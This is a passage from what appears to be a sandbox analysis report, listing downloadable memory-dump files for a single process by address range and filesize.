4.6MB

Download
memory/3032-62-0x0000000006310000-0x00000000067CC000-memory.dmp

Filesize
4.7MB

Download
memory/3032-71-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-48-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-73-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-47-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-75-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-30-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-77-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-29-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-79-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-80-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-28-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-91-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-27-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-26-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-25-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-23-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-22-0x0000000000D11000-0x0000000000D3F000-memory.dmp

Filesize
184KB

Download
memory/3032-21-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download